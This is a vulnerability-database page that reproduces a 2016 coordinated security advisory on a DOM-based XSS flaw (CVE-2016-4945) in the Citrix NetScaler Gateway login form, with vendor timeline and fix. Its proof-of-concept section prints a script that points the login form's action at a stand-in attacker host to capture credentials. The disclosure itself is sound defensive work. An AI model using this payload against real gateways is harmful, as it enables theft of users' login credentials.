Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Citrix Netscaler 11.0 Build 64.35 Cross Site Scripting

🗓️ 27 May 2016 00:00:00Reported by Dr. Daniel SchliebnerType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 170 Views

Citrix Netscaler Cross Site Scripting Vulnerability in 11.0 Build 64.3

Related
Code
ReporterTitlePublishedViews
Family
CNVD		Citrix NetScaler Gateway Clickjacking Vulnerability
31 May 201600:00
cnvd
CVE		CVE-2016-4945
1 Jun 201622:00
cve
Cvelist		CVE-2016-4945
1 Jun 201622:00
cvelist
EUVD		EUVD-2016-5920
7 Oct 202500:30
euvd
NVD		CVE-2016-4945
1 Jun 201622:59
nvd
OpenVAS		Citrix NetScaler Gateway Login Form Hijacking Vulnerability (CTX213313)
30 May 201600:00
openvas
Prion		Cross site scripting
1 Jun 201622:59
prion
VulnCheck KEV		VulnCheck KEV: CVE-2016-4945
16 Jul 202400:00
vulncheck_kev
` PERSICON Security Advisory  
=======================================================================  
Title: Login Form Hijacking vulnerability  
Product: Citrix Netscaler  
Vulnerable Version: 11.0 Build 64.35  
Fixed Version: 11.0 Build 66.11  
CVE-ID: CVE-2016-4945  
Impact: medium  
found: 2015-04-07  
by: Dr. Daniel Schliebner <[email protected]>  
http://www.persicon.com  
=======================================================================  
  
Vendor Description:  
-------------------  
"Citrix (NASDAQ:CTXS) aims to power a world where people, organizations  
and things are securely connected and accessible to make the   
extraordinary possible. Its technology makes the world's apps and   
data secure and easy to access, empowering people to work anywhere   
and at any time. Citrix provides a complete and integrated portfolio   
of Workspace-as-a-Service, application delivery, virtualization, mobility,   
network delivery and file sharing solutions that enables IT to ensure   
critical systems are securely available to users via the cloud or   
on-premise and across any device or platform. With annual revenue   
in 2015 of $3.28 billion, Citrix solutions are in use by more than   
400,000 organizations and over 100 million users globally."   
(https://www.citrix.com/about.html)  
  
  
Vulnerability Description:  
--------------------------  
The login page of the Citrix Netscaler Gateway web frontend is   
vulnerable to a DOM-based Cross-Site-Scripting (XSS) vulnerability due  
to improper sanitization of the content of the "NSC_TMAC" cookie.  
  
The vulnerability is located in the file   
  
/vpn/js/gateway_login_form_view.js  
  
in which the the cookie's content is - if set - written to the DOM  
via JavaScript. This is done in the following excerpt:  
  
var cookie_action = ns_getcookie("NSC_TMAC");   
var action_url= '/cgi/login';   
if (cookie_action) {   
action_url = cookie_action;  
UnsetCookie("NSC_TMAC");  
  
This vulnerability can be exploited by an unauthorized remote attacker  
by forging the destination address of the login formular in order to  
receive login credentials of a victim. This can be achieved by for  
example using another XSS vulnerability on the companies web page.  
  
  
Proof of concept:  
-----------------  
Assume this vulnerability resides on https://my-foobar-company.com/vpn/.  
Assume further, an attacker is able to set a cookie on a victims client  
via some other attack vector like, e.g., another XSS vulnerability.  
  
The attacker needs to first (e.g. by XSS) execute the following code  
on the client:  
  
<script>  
document.cookie='NSC_TMAC=https://attack.ers/receive/;' +   
' domain=.my-foobar-company.com';  
window.location.href='https://my-foobar-company.com/vpn/'  
</script>  
  
As a consequence, the Netscaler Gateway login formular has the url  
"https://attack.ers/receive/" as the value in its "action" attribute  
and hence a victim will sent its credentials to the attackers  
host when submitting the formular.  
  
  
Vulnerable / tested versions:  
-----------------------------  
Citrix Netscaler 11.0 Build 65.31  
Citrix Netscaler 11.0 Build 64.34  
  
  
Vendor contact timeline:  
------------------------  
2016-04-11: Contacting vendor through [email protected]   
2015-04-11: Vendor response - issue has now the case ID CASE-6597   
and will be forwarded for feedback   
2016-04-12: Vendor response - issue will be reviewed  
2016-04-25: Vendor response - issue will be fixed  
2016-05-24: Vendor response - issue is fixed in the upcoming  
release on 26th May  
2016-05-26: Vendor response - issue is fixed in the upcoming  
release at 5pm PDT on 26th May  
2016-05-27: Status update - fix released by vendor  
2016-05-27: Coordinated release of the security advisory  
  
  
Solution:  
---------  
Remove the use of the cookie content or sanitize its content properly  
before writing it to the DOM.  
  
  
References  
----------  
[1] http://support.citrix.com/article/CTX213313  
  
  
URL  
---  
http://persicon.com/tl_files/advisories/PERSICON-advisory-2016-No-1-citrix.t  
xt  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 May 2016 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.00617
citrix netscalercross site scriptingvulnerabilitydom-basedcookie hijackingsecurity advisory
170